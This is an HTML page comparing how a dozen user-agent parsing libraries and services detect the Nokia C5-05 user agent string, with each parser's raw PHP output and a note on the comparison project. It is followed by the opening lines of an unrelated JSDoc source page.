</td></tr><tr><td>JenssegersAgent<br /><small>v2.3.3</small><br /></td><td> </td><td><i class="material-icons">close</i></td><td> </td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.001</td><td>
<!-- Modal Trigger -->
<a class="modal-trigger btn waves-effect waves-light" href="#modal-b85a2b91-6a55-4436-a82c-1ea0d46e2e51">Detail</a>
<!-- Modal Structure -->
<div id="modal-b85a2b91-6a55-4436-a82c-1ea0d46e2e51" class="modal modal-fixed-footer">
<div class="modal-content">
<h4>JenssegersAgent result detail</h4>
<p><pre><code class="php">Array
(
[browserName] =>
[browserVersion] =>
[osName] =>
[osVersion] =>
[deviceModel] => GenericPhone
[isMobile] => 1
[isRobot] =>
[botName] =>
)
</code></pre></p>
</div>
<div class="modal-footer">
<a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a>
</div>
</div>
</td></tr><tr><td>NeutrinoApiCom<br /><small></small><br /></td><td> </td><td><i class="material-icons">close</i></td><td>Series60 </td><td style="border-left: 1px solid #555">Nokia</td><td>C5-05</td><td>mobile-browser</td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.24001</td><td>
<!-- Modal Trigger -->
<a class="modal-trigger btn waves-effect waves-light" href="#modal-8c2a7a4e-3fbf-4df2-8d61-5e730422f67b">Detail</a>
<!-- Modal Structure -->
<div id="modal-8c2a7a4e-3fbf-4df2-8d61-5e730422f67b" class="modal modal-fixed-footer">
<div class="modal-content">
<h4>NeutrinoApiCom result detail</h4>
<p><pre><code class="php">stdClass Object
(
[mobile_screen_height] => 0
[is_mobile] => 1
[type] => mobile-browser
[mobile_brand] => Nokia
[mobile_model] => C5-05
[version] =>
[is_android] =>
[browser_name] => unknown
[operating_system_family] => Series60
[operating_system_version] =>
[is_ios] =>
[producer] => Nokia
[operating_system] => Series60
[mobile_screen_width] => 0
[mobile_browser] =>
)
</code></pre></p>
</div>
<div class="modal-footer">
<a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a>
</div>
</div>
</td></tr><tr><td>PiwikDeviceDetector<br /><small>3.6.1</small><br /></td><td>Nokia Browser </td><td> </td><td>Symbian </td><td style="border-left: 1px solid #555">Nokia</td><td>C5-05</td><td>smartphone</td><td>yes</td><td></td><td style="border-left: 1px solid #555"></td><td></td><td></td><td>0.003</td><td>
<!-- Modal Trigger -->
<a class="modal-trigger btn waves-effect waves-light" href="#modal-4a941d34-a8d3-4914-9724-346f60ad7046">Detail</a>
<!-- Modal Structure -->
<div id="modal-4a941d34-a8d3-4914-9724-346f60ad7046" class="modal modal-fixed-footer">
<div class="modal-content">
<h4>PiwikDeviceDetector result detail</h4>
<p><pre><code class="php">Array
(
[client] => Array
(
[type] => browser
[name] => Nokia Browser
[short_name] => NB
[version] =>
[engine] =>
)
[operatingSystem] => Array
(
[name] => Symbian
[short_name] => SYM
[version] =>
[platform] =>
)
[device] => Array
(
[brand] => NK
[brandName] => Nokia
[model] => C5-05
[device] => 1
[deviceName] => smartphone
)
[bot] =>
[extra] => Array
(
[isBot] =>
[isBrowser] => 1
[isFeedReader] =>
[isMobileApp] =>
[isPIM] =>
[isLibrary] =>
[isMediaPlayer] =>
[isCamera] =>
[isCarBrowser] =>
[isConsole] =>
[isFeaturePhone] =>
[isPhablet] =>
[isPortableMediaPlayer] =>
[isSmartDisplay] =>
[isSmartphone] => 1
[isTablet] =>
[isTV] =>
[isDesktop] =>
[isMobile] => 1
[isTouchEnabled] =>
)
)
</code></pre></p>
</div>
<div class="modal-footer">
<a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a>
</div>
</div>
</td></tr><tr><td>SinergiBrowserDetector<br /><small>6.0.1</small><br /></td><td> </td><td><i class="material-icons">close</i></td><td>Nokia </td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td></td><td><i class="material-icons">close</i></td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0</td><td>
<!-- Modal Trigger -->
<a class="modal-trigger btn waves-effect waves-light" href="#modal-ec1cd248-02b0-457e-8a9d-35bb99af008c">Detail</a>
<!-- Modal Structure -->
<div id="modal-ec1cd248-02b0-457e-8a9d-35bb99af008c" class="modal modal-fixed-footer">
<div class="modal-content">
<h4>SinergiBrowserDetector result detail</h4>
<p><pre><code class="php">Array
(
[browser] => Sinergi\BrowserDetector\Browser Object
(
[userAgent:Sinergi\BrowserDetector\Browser:private] => Sinergi\BrowserDetector\UserAgent Object
(
[userAgentString:Sinergi\BrowserDetector\UserAgent:private] => NokiaC5-05
)
[name:Sinergi\BrowserDetector\Browser:private] => unknown
[version:Sinergi\BrowserDetector\Browser:private] => unknown
[isRobot:Sinergi\BrowserDetector\Browser:private] =>
[isChromeFrame:Sinergi\BrowserDetector\Browser:private] =>
[isFacebookWebView:Sinergi\BrowserDetector\Browser:private] =>
[isCompatibilityMode:Sinergi\BrowserDetector\Browser:private] =>
)
[operatingSystem] => Sinergi\BrowserDetector\Os Object
(
[name:Sinergi\BrowserDetector\Os:private] => Nokia
[version:Sinergi\BrowserDetector\Os:private] => unknown
[isMobile:Sinergi\BrowserDetector\Os:private] => 1
[userAgent:Sinergi\BrowserDetector\Os:private] => Sinergi\BrowserDetector\UserAgent Object
(
[userAgentString:Sinergi\BrowserDetector\UserAgent:private] => NokiaC5-05
)
)
[device] => Sinergi\BrowserDetector\Device Object
(
[name:Sinergi\BrowserDetector\Device:private] => unknown
[userAgent:Sinergi\BrowserDetector\Device:private] => Sinergi\BrowserDetector\UserAgent Object
(
[userAgentString:Sinergi\BrowserDetector\UserAgent:private] => NokiaC5-05
)
)
)
</code></pre></p>
</div>
<div class="modal-footer">
<a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a>
</div>
</div>
</td></tr><tr><td>UAParser<br /><small>v3.4.5</small><br /></td><td>Nokia Services (WAP) Browser </td><td><i class="material-icons">close</i></td><td> </td><td style="border-left: 1px solid #555">Nokia</td><td>C5-05</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.002</td><td>
<!-- Modal Trigger -->
<a class="modal-trigger btn waves-effect waves-light" href="#modal-3160e405-8a8f-46dd-8f47-5115f06462d2">Detail</a>
<!-- Modal Structure -->
<div id="modal-3160e405-8a8f-46dd-8f47-5115f06462d2" class="modal modal-fixed-footer">
<div class="modal-content">
<h4>UAParser result detail</h4>
<p><pre><code class="php">UAParser\Result\Client Object
(
[ua] => UAParser\Result\UserAgent Object
(
[major] =>
[minor] =>
[patch] =>
[family] => Nokia Services (WAP) Browser
)
[os] => UAParser\Result\OperatingSystem Object
(
[major] =>
[minor] =>
[patch] =>
[patchMinor] =>
[family] => Other
)
[device] => UAParser\Result\Device Object
(
[brand] => Nokia
[model] => C5-05
[family] => Nokia C5-05
)
[originalUserAgent] => NokiaC5-05
)
</code></pre></p>
</div>
<div class="modal-footer">
<a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a>
</div>
</div>
</td></tr><tr><td>UserAgentApiCom<br /><small></small><br /></td><td> </td><td> </td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>Mobile</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.15001</td><td>
<!-- Modal Trigger -->
<a class="modal-trigger btn waves-effect waves-light" href="#modal-afeb05fb-26b9-4509-b8ac-0c604a9e97d6">Detail</a>
<!-- Modal Structure -->
<div id="modal-afeb05fb-26b9-4509-b8ac-0c604a9e97d6" class="modal modal-fixed-footer">
<div class="modal-content">
<h4>UserAgentApiCom result detail</h4>
<p><pre><code class="php">stdClass Object
(
[platform_name] => Nokia
[platform_version] => 5
[platform_type] => Mobile
)
</code></pre></p>
</div>
<div class="modal-footer">
<a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a>
</div>
</div>
</td></tr><tr><td>UserAgentStringCom<br /><small></small><br /></td>
<td colspan="12" class="center-align red lighten-1">
<strong>No result found</strong>
</td>
</tr><tr><td>WhatIsMyBrowserCom<br /><small></small><br /></td><td>Nokia Browser </td><td> </td><td>NokiaOS </td><td style="border-left: 1px solid #555">Nokia</td><td>Nokia C5-05</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.23601</td><td>
<!-- Modal Trigger -->
<a class="modal-trigger btn waves-effect waves-light" href="#modal-5fc1ff22-a74d-481b-9ad1-fcfde73ded9c">Detail</a>
<!-- Modal Structure -->
<div id="modal-5fc1ff22-a74d-481b-9ad1-fcfde73ded9c" class="modal modal-fixed-footer">
<div class="modal-content">
<h4>WhatIsMyBrowserCom result detail</h4>
<p><pre><code class="php">stdClass Object
(
[operating_system_name] => NokiaOS
[simple_sub_description_string] =>
[simple_browser_string] => Nokia Browser on NokiaOS
[browser_version] =>
[extra_info] => Array
(
)
[operating_platform] => Nokia C5-05
[extra_info_table] => Array
(
)
[layout_engine_name] =>
[detected_addons] => Array
(
)
[operating_system_flavour_code] =>
[hardware_architecture] =>
[operating_system_flavour] =>
[operating_system_frameworks] => Array
(
)
[browser_name_code] => nokia-browser
[operating_system_version] =>
[simple_operating_platform_string] => Nokia C5-05
[is_abusive] =>
[layout_engine_version] =>
[browser_capabilities] => Array
(
)
[operating_platform_vendor_name] => Nokia
[operating_system] => NokiaOS
[operating_system_version_full] =>
[operating_platform_code] => C5-05
[browser_name] => Nokia Browser
[operating_system_name_code] => nokiaos
[user_agent] => NokiaC5-05
[browser_version_full] =>
[browser] => Nokia Browser
)
</code></pre></p>
</div>
<div class="modal-footer">
<a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a>
</div>
</div>
</td></tr><tr><td>WhichBrowser<br /><small>v2.0.18</small><br /></td><td> </td><td> </td><td>Series60 </td><td style="border-left: 1px solid #555">Nokia</td><td>C5-05</td><td>mobile:smart</td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.001</td><td>
<!-- Modal Trigger -->
<a class="modal-trigger btn waves-effect waves-light" href="#modal-083a336f-5d73-4505-84f3-c5fc9bb78652">Detail</a>
<!-- Modal Structure -->
<div id="modal-083a336f-5d73-4505-84f3-c5fc9bb78652" class="modal modal-fixed-footer">
<div class="modal-content">
<h4>WhichBrowser result detail</h4>
<p><pre><code class="php">Array
(
[os] => Array
(
[name] => Series60
[family] => Symbian
)
[device] => Array
(
[type] => mobile
[subtype] => smart
[manufacturer] => Nokia
[model] => C5-05
)
)
</code></pre></p>
</div>
<div class="modal-footer">
<a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a>
</div>
</div>
</td></tr><tr><td>Woothee<br /><small>v1.2.0</small><br /></td>
<td colspan="12" class="center-align red lighten-1">
<strong>No result found</strong>
</td>
</tr><tr><td>Wurfl<br /><small>1.7.1.0</small><br /></td><td> </td><td><i class="material-icons">close</i></td><td> </td><td style="border-left: 1px solid #555"></td><td></td><td>Feature Phone</td><td>yes</td><td></td><td style="border-left: 1px solid #555"></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.015</td><td>
<!-- Modal Trigger -->
<a class="modal-trigger btn waves-effect waves-light" href="#modal-a2bedf8c-4a95-42a7-96c5-aaf233b2ac50">Detail</a>
<!-- Modal Structure -->
<div id="modal-a2bedf8c-4a95-42a7-96c5-aaf233b2ac50" class="modal modal-fixed-footer">
<div class="modal-content">
<h4>Wurfl result detail</h4>
<p><pre><code class="php">Array
(
[virtual] => Array
(
[is_android] => false
[is_ios] => false
[is_windows_phone] => false
[is_app] => false
[is_full_desktop] => false
[is_largescreen] => false
[is_mobile] => true
[is_robot] => false
[is_smartphone] => false
[is_touchscreen] => false
[is_wml_preferred] => false
[is_xhtmlmp_preferred] => true
[is_html_preferred] => false
[advertised_device_os] =>
[advertised_device_os_version] =>
[advertised_browser] =>
[advertised_browser_version] =>
[complete_device_name] =>
[device_name] =>
[form_factor] => Feature Phone
[is_phone] => true
[is_app_webview] => false
)
[all] => Array
(
[brand_name] =>
[model_name] =>
[unique] => true
[ununiqueness_handler] =>
[is_wireless_device] => true
[device_claims_web_support] => false
[has_qwerty_keyboard] => false
[can_skip_aligned_link_row] => false
[uaprof] =>
[uaprof2] =>
[uaprof3] =>
[nokia_series] => 0
[nokia_edition] => 0
[device_os] =>
[mobile_browser] =>
[mobile_browser_version] =>
[device_os_version] =>
[pointing_method] =>
[release_date] => 2002_january
[marketing_name] =>
[model_extra_info] =>
[nokia_feature_pack] => 0
[can_assign_phone_number] => true
[is_tablet] => false
[manufacturer_name] =>
[is_bot] => false
[is_google_glass] => false
[proportional_font] => false
[built_in_back_button_support] => false
[card_title_support] => true
[softkey_support] => false
[table_support] => true
[numbered_menus] => false
[menu_with_select_element_recommended] => false
[menu_with_list_of_links_recommended] => true
[icons_on_menu_items_support] => false
[break_list_of_links_with_br_element_recommended] => true
[access_key_support] => false
[wrap_mode_support] => false
[times_square_mode_support] => false
[deck_prefetch_support] => false
[elective_forms_recommended] => true
[wizards_recommended] => false
[image_as_link_support] => false
[insert_br_element_after_widget_recommended] => false
[wml_can_display_images_and_text_on_same_line] => false
[wml_displays_image_in_center] => false
[opwv_wml_extensions_support] => false
[wml_make_phone_call_string] => wtai://wp/mc;
[chtml_display_accesskey] => false
[emoji] => false
[chtml_can_display_images_and_text_on_same_line] => false
[chtml_displays_image_in_center] => false
[imode_region] => none
[chtml_make_phone_call_string] => tel:
[chtml_table_support] => false
[xhtml_honors_bgcolor] => false
[xhtml_supports_forms_in_table] => false
[xhtml_support_wml2_namespace] => false
[xhtml_autoexpand_select] => false
[xhtml_select_as_dropdown] => false
[xhtml_select_as_radiobutton] => false
[xhtml_select_as_popup] => false
[xhtml_display_accesskey] => false
[xhtml_supports_invisible_text] => false
[xhtml_supports_inline_input] => false
[xhtml_supports_monospace_font] => false
[xhtml_supports_table_for_layout] => false
[xhtml_supports_css_cell_table_coloring] => false
[xhtml_format_as_css_property] => false
[xhtml_format_as_attribute] => false
[xhtml_nowrap_mode] => false
[xhtml_marquee_as_css_property] => false
[xhtml_readable_background_color1] => #FFFFFF
[xhtml_readable_background_color2] => #FFFFFF
[xhtml_allows_disabled_form_elements] => false
[xhtml_document_title_support] => true
[xhtml_preferred_charset] => utf8
[opwv_xhtml_extensions_support] => false
[xhtml_make_phone_call_string] => tel:
[xhtmlmp_preferred_mime_type] => application/vnd.wap.xhtml+xml
[xhtml_table_support] => false
[xhtml_send_sms_string] => none
[xhtml_send_mms_string] => none
[xhtml_file_upload] => not_supported
[cookie_support] => true
[accept_third_party_cookie] => true
[xhtml_supports_iframe] => none
[xhtml_avoid_accesskeys] => false
[xhtml_can_embed_video] => none
[ajax_support_javascript] => false
[ajax_manipulate_css] => false
[ajax_support_getelementbyid] => false
[ajax_support_inner_html] => false
[ajax_xhr_type] => none
[ajax_manipulate_dom] => false
[ajax_support_events] => false
[ajax_support_event_listener] => false
[ajax_preferred_geoloc_api] => none
[xhtml_support_level] => 1
[preferred_markup] => html_wi_oma_xhtmlmp_1_0
[wml_1_1] => true
[wml_1_2] => false
[wml_1_3] => false
[html_wi_w3_xhtmlbasic] => true
[html_wi_oma_xhtmlmp_1_0] => true
[html_wi_imode_html_1] => false
[html_wi_imode_html_2] => false
[html_wi_imode_html_3] => false
[html_wi_imode_html_4] => false
[html_wi_imode_html_5] => false
[html_wi_imode_htmlx_1] => false
[html_wi_imode_htmlx_1_1] => false
[html_wi_imode_compact_generic] => false
[html_web_3_2] => false
[html_web_4_0] => false
[voicexml] => false
[multipart_support] => false
[total_cache_disable_support] => false
[time_to_live_support] => false
[resolution_width] => 90
[resolution_height] => 90
[columns] => 11
[max_image_width] => 90
[max_image_height] => 35
[rows] => 6
[physical_screen_width] => 27
[physical_screen_height] => 27
[dual_orientation] => false
[density_class] => 1.0
[wbmp] => true
[bmp] => false
[epoc_bmp] => false
[gif_animated] => false
[jpg] => false
[png] => false
[tiff] => false
[transparent_png_alpha] => false
[transparent_png_index] => false
[svgt_1_1] => false
[svgt_1_1_plus] => false
[greyscale] => false
[gif] => true
[colors] => 256
[webp_lossy_support] => false
[webp_lossless_support] => false
[post_method_support] => true
[basic_authentication_support] => true
[empty_option_value_support] => true
[emptyok] => false
[nokia_voice_call] => false
[wta_voice_call] => false
[wta_phonebook] => false
[wta_misc] => false
[wta_pdc] => false
[https_support] => true
[phone_id_provided] => false
[max_data_rate] => 9
[wifi] => false
[sdio] => false
[vpn] => false
[has_cellular_radio] => true
[max_deck_size] => 4000
[max_url_length_in_requests] => 128
[max_url_length_homepage] => 0
[max_url_length_bookmark] => 0
[max_url_length_cached_page] => 0
[max_no_of_connection_settings] => 0
[max_no_of_bookmarks] => 0
[max_length_of_username] => 0
[max_length_of_password] => 0
[max_object_size] => 0
[downloadfun_support] => false
[directdownload_support] => false
[inline_support] => false
[oma_support] => false
[ringtone] => false
[ringtone_3gpp] => false
[ringtone_midi_monophonic] => false
[ringtone_midi_polyphonic] => false
[ringtone_imelody] => false
[ringtone_digiplug] => false
[ringtone_compactmidi] => false
[ringtone_mmf] => false
[ringtone_rmf] => false
[ringtone_xmf] => false
[ringtone_amr] => false
[ringtone_awb] => false
[ringtone_aac] => false
[ringtone_wav] => false
[ringtone_mp3] => false
[ringtone_spmidi] => false
[ringtone_qcelp] => false
[ringtone_voices] => 1
[ringtone_df_size_limit] => 0
[ringtone_directdownload_size_limit] => 0
[ringtone_inline_size_limit] => 0
[ringtone_oma_size_limit] => 0
[wallpaper] => false
[wallpaper_max_width] => 0
[wallpaper_max_height] => 0
[wallpaper_preferred_width] => 0
[wallpaper_preferred_height] => 0
[wallpaper_resize] => none
[wallpaper_wbmp] => false
[wallpaper_bmp] => false
[wallpaper_gif] => false
[wallpaper_jpg] => false
[wallpaper_png] => false
[wallpaper_tiff] => false
[wallpaper_greyscale] => false
[wallpaper_colors] => 2
[wallpaper_df_size_limit] => 0
[wallpaper_directdownload_size_limit] => 0
[wallpaper_inline_size_limit] => 0
[wallpaper_oma_size_limit] => 0
[screensaver] => false
[screensaver_max_width] => 0
[screensaver_max_height] => 0
[screensaver_preferred_width] => 0
[screensaver_preferred_height] => 0
[screensaver_resize] => none
[screensaver_wbmp] => false
[screensaver_bmp] => false
[screensaver_gif] => false
[screensaver_jpg] => false
[screensaver_png] => false
[screensaver_greyscale] => false
[screensaver_colors] => 2
[screensaver_df_size_limit] => 0
[screensaver_directdownload_size_limit] => 0
[screensaver_inline_size_limit] => 0
[screensaver_oma_size_limit] => 0
[picture] => false
[picture_max_width] => 0
[picture_max_height] => 0
[picture_preferred_width] => 0
[picture_preferred_height] => 0
[picture_resize] => none
[picture_wbmp] => false
[picture_bmp] => false
[picture_gif] => false
[picture_jpg] => false
[picture_png] => false
[picture_greyscale] => false
[picture_colors] => 2
[picture_df_size_limit] => 0
[picture_directdownload_size_limit] => 0
[picture_inline_size_limit] => 0
[picture_oma_size_limit] => 0
[video] => false
[oma_v_1_0_forwardlock] => false
[oma_v_1_0_combined_delivery] => false
[oma_v_1_0_separate_delivery] => false
[streaming_video] => false
[streaming_3gpp] => false
[streaming_mp4] => false
[streaming_mov] => false
[streaming_video_size_limit] => 0
[streaming_real_media] => none
[streaming_flv] => false
[streaming_3g2] => false
[streaming_vcodec_h263_0] => -1
[streaming_vcodec_h263_3] => -1
[streaming_vcodec_mpeg4_sp] => -1
[streaming_vcodec_mpeg4_asp] => -1
[streaming_vcodec_h264_bp] => -1
[streaming_acodec_amr] => none
[streaming_acodec_aac] => none
[streaming_wmv] => none
[streaming_preferred_protocol] => rtsp
[streaming_preferred_http_protocol] => none
[wap_push_support] => false
[connectionless_service_indication] => false
[connectionless_service_load] => false
[connectionless_cache_operation] => false
[connectionoriented_unconfirmed_service_indication] => false
[connectionoriented_unconfirmed_service_load] => false
[connectionoriented_unconfirmed_cache_operation] => false
[connectionoriented_confirmed_service_indication] => false
[connectionoriented_confirmed_service_load] => false
[connectionoriented_confirmed_cache_operation] => false
[utf8_support] => false
[ascii_support] => false
[iso8859_support] => false
[expiration_date] => false
[j2me_cldc_1_0] => false
[j2me_cldc_1_1] => false
[j2me_midp_1_0] => false
[j2me_midp_2_0] => false
[doja_1_0] => false
[doja_1_5] => false
[doja_2_0] => false
[doja_2_1] => false
[doja_2_2] => false
[doja_3_0] => false
[doja_3_5] => false
[doja_4_0] => false
[j2me_jtwi] => false
[j2me_mmapi_1_0] => false
[j2me_mmapi_1_1] => false
[j2me_wmapi_1_0] => false
[j2me_wmapi_1_1] => false
[j2me_wmapi_2_0] => false
[j2me_btapi] => false
[j2me_3dapi] => false
[j2me_locapi] => false
[j2me_nokia_ui] => false
[j2me_motorola_lwt] => false
[j2me_siemens_color_game] => false
[j2me_siemens_extension] => false
[j2me_heap_size] => 0
[j2me_max_jar_size] => 0
[j2me_storage_size] => 0
[j2me_max_record_store_size] => 0
[j2me_screen_width] => 0
[j2me_screen_height] => 0
[j2me_canvas_width] => 0
[j2me_canvas_height] => 0
[j2me_bits_per_pixel] => 0
[j2me_audio_capture_enabled] => false
[j2me_video_capture_enabled] => false
[j2me_photo_capture_enabled] => false
[j2me_capture_image_formats] => none
[j2me_http] => false
[j2me_https] => false
[j2me_socket] => false
[j2me_udp] => false
[j2me_serial] => false
[j2me_gif] => false
[j2me_gif89a] => false
[j2me_jpg] => false
[j2me_png] => false
[j2me_bmp] => false
[j2me_bmp3] => false
[j2me_wbmp] => false
[j2me_midi] => false
[j2me_wav] => false
[j2me_amr] => false
[j2me_mp3] => false
[j2me_mp4] => false
[j2me_imelody] => false
[j2me_rmf] => false
[j2me_au] => false
[j2me_aac] => false
[j2me_realaudio] => false
[j2me_xmf] => false
[j2me_wma] => false
[j2me_3gpp] => false
[j2me_h263] => false
[j2me_svgt] => false
[j2me_mpeg4] => false
[j2me_realvideo] => false
[j2me_real8] => false
[j2me_realmedia] => false
[j2me_left_softkey_code] => 0
[j2me_right_softkey_code] => 0
[j2me_middle_softkey_code] => 0
[j2me_select_key_code] => 0
[j2me_return_key_code] => 0
[j2me_clear_key_code] => 0
[j2me_datefield_no_accepts_null_date] => false
[j2me_datefield_broken] => false
[receiver] => false
[sender] => false
[mms_max_size] => 0
[mms_max_height] => 0
[mms_max_width] => 0
[built_in_recorder] => false
[built_in_camera] => false
[mms_jpeg_baseline] => false
[mms_jpeg_progressive] => false
[mms_gif_static] => false
[mms_gif_animated] => false
[mms_png] => false
[mms_bmp] => false
[mms_wbmp] => false
[mms_amr] => false
[mms_wav] => false
[mms_midi_monophonic] => false
[mms_midi_polyphonic] => false
[mms_midi_polyphonic_voices] => 0
[mms_spmidi] => false
[mms_mmf] => false
[mms_mp3] => false
[mms_evrc] => false
[mms_qcelp] => false
[mms_ota_bitmap] => false
[mms_nokia_wallpaper] => false
[mms_nokia_operatorlogo] => false
[mms_nokia_3dscreensaver] => false
[mms_nokia_ringingtone] => false
[mms_rmf] => false
[mms_xmf] => false
[mms_symbian_install] => false
[mms_jar] => false
[mms_jad] => false
[mms_vcard] => false
[mms_vcalendar] => false
[mms_wml] => false
[mms_wbxml] => false
[mms_wmlc] => false
[mms_video] => false
[mms_mp4] => false
[mms_3gpp] => false
[mms_3gpp2] => false
[mms_max_frame_rate] => 0
[nokiaring] => false
[picturemessage] => false
[operatorlogo] => false
[largeoperatorlogo] => false
[callericon] => false
[nokiavcard] => false
[nokiavcal] => false
[sckl_ringtone] => false
[sckl_operatorlogo] => false
[sckl_groupgraphic] => false
[sckl_vcard] => false
[sckl_vcalendar] => false
[text_imelody] => false
[ems] => false
[ems_variablesizedpictures] => false
[ems_imelody] => false
[ems_odi] => false
[ems_upi] => false
[ems_version] => 0
[siemens_ota] => false
[siemens_logo_width] => 101
[siemens_logo_height] => 29
[siemens_screensaver_width] => 101
[siemens_screensaver_height] => 50
[gprtf] => false
[sagem_v1] => false
[sagem_v2] => false
[panasonic] => false
[sms_enabled] => true
[wav] => false
[mmf] => false
[smf] => false
[mld] => false
[midi_monophonic] => false
[midi_polyphonic] => false
[sp_midi] => false
[rmf] => false
[xmf] => false
[compactmidi] => false
[digiplug] => false
[nokia_ringtone] => false
[imelody] => false
[au] => false
[amr] => false
[awb] => false
[aac] => false
[mp3] => false
[voices] => 1
[qcelp] => false
[evrc] => false
[flash_lite_version] =>
[fl_wallpaper] => false
[fl_screensaver] => false
[fl_standalone] => false
[fl_browser] => false
[fl_sub_lcd] => false
[full_flash_support] => false
[css_supports_width_as_percentage] => true
[css_border_image] => none
[css_rounded_corners] => none
[css_gradient] => none
[css_spriting] => false
[css_gradient_linear] => none
[is_transcoder] => false
[transcoder_ua_header] => user-agent
[rss_support] => false
[pdf_support] => false
[progressive_download] => false
[playback_vcodec_h263_0] => -1
[playback_vcodec_h263_3] => -1
[playback_vcodec_mpeg4_sp] => -1
[playback_vcodec_mpeg4_asp] => -1
[playback_vcodec_h264_bp] => -1
[playback_real_media] => none
[playback_3gpp] => false
[playback_3g2] => false
[playback_mp4] => false
[playback_mov] => false
[playback_acodec_amr] => none
[playback_acodec_aac] => none
[playback_df_size_limit] => 0
[playback_directdownload_size_limit] => 0
[playback_inline_size_limit] => 0
[playback_oma_size_limit] => 0
[playback_acodec_qcelp] => false
[playback_wmv] => none
[hinted_progressive_download] => false
[html_preferred_dtd] => xhtml_mp1
[viewport_supported] => false
[viewport_width] =>
[viewport_userscalable] =>
[viewport_initial_scale] =>
[viewport_maximum_scale] =>
[viewport_minimum_scale] =>
[mobileoptimized] => false
[handheldfriendly] => false
[canvas_support] => none
[image_inlining] => false
[is_smarttv] => false
[is_console] => false
[nfc_support] => false
[ux_full_desktop] => false
[jqm_grade] => none
[is_sencha_touch_ok] => false
)
)
</code></pre></p>
</div>
<div class="modal-footer">
<a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a>
</div>
</div>
</td></tr><tr><td>Zsxsoft<br /><small>1.3</small><br /></td><td>Nokia Web Browser </td><td><i class="material-icons">close</i></td><td> </td><td style="border-left: 1px solid #555">Nokia</td><td></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0</td><td>
<!-- Modal Trigger -->
<a class="modal-trigger btn waves-effect waves-light" href="#modal-5d43e024-b46c-44f6-8914-529b05569bc2">Detail</a>
<!-- Modal Structure -->
<div id="modal-5d43e024-b46c-44f6-8914-529b05569bc2" class="modal modal-fixed-footer">
<div class="modal-content">
<h4>Zsxsoft result detail</h4>
<p><pre><code class="php">Array
(
[browser] => Array
(
[link] => http://www.nokia.com/browser
[title] => Nokia Web Browser
[name] => Nokia Web Browser
[version] =>
[code] => maemo
[image] => img/16/browser/maemo.png
)
[os] => Array
(
[link] =>
[name] =>
[version] =>
[code] => null
[x64] =>
[title] =>
[type] => os
[dir] => os
[image] => img/16/os/null.png
)
[device] => Array
(
[link] => http://www.nokia.com/
[title] => Nokia
[model] =>
[brand] => Nokia
[code] => nokia
[dir] => device
[type] => device
[image] => img/16/device/nokia.png
)
[platform] => Array
(
[link] => http://www.nokia.com/
[title] => Nokia
[model] =>
[brand] => Nokia
[code] => nokia
[dir] => device
[type] => device
[image] => img/16/device/nokia.png
)
)
</code></pre></p>
</div>
<div class="modal-footer">
<a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a>
</div>
</div>
</td></tr></table>
</div>
<div class="section">
<h1 class="header center orange-text">About this comparison</h1>
<div class="row center">
<h5 class="header light">
The primary goal of this project is simple<br />
I wanted to know which user agent parser is the most accurate in each part - device detection, bot detection and so on...<br />
<br />
The secondary goal is to provide a source for all user agent parsers to improve their detection based on this results.<br />
<br />
You can also improve this further, by suggesting ideas at <a href="https://github.com/ThaDafinser/UserAgentParserComparison">ThaDafinser/UserAgentParserComparison</a><br />
<br />
The comparison is based on the abstraction by <a href="https://github.com/ThaDafinser/UserAgentParser">ThaDafinser/UserAgentParser</a>
</h5>
</div>
</div>
<div class="card">
<div class="card-content">
Comparison created <i>2016-05-10 07:53:24</i> | by
<a href="https://github.com/ThaDafinser">ThaDafinser</a>
</div>
</div>
</div>
<script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/js/materialize.min.js"></script>
<script src="http://cdnjs.cloudflare.com/ajax/libs/list.js/1.2.0/list.min.js"></script>
<script>
$(document).ready(function(){
// the "href" attribute of .modal-trigger must specify the modal ID that wants to be triggered
$('.modal-trigger').leanModal();
});
</script>
</body>
</html>
|
doc/FCalendar.js.html
|
fsy0718/calendar
|
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Source: FCalendar.js</title>
<script src="scripts/prettify/prettify.js"></script>
<script src="scripts/prettify/lang-css.js"></script>
<script src="scripts/jquery.min.js"></script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
